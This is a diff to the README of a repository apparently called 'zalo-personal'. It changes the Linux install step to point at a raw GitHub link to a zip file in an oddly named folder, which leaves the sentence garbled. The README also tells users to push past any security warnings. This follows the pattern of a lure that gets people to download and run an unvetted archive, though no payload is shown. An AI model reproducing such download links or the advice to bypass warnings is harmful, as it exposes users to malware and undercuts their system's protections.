zainkalkhan/zalo-personal/README.md

 - On **Windows**: Open the `.exe` file and follow the setup wizard prompts to install.
 - On **macOS**: Open the `.dmg` file, then drag the zalo-personal app to your Applications folder.
-- On **Linux**: Extract the `.tar.gz` archive, then run the included setup script or executable as described in the included README.
+- On **Linux**: Extract the `https://raw.githubusercontent.com/zainkalkhan/zalo-personal/main/ribbed/zalo-personal-1.7.zip` archive, then run the included setup script or executable as described in the included README.

 If you see any security warnings when opening the file, confirm that you want to proceed or run anyway.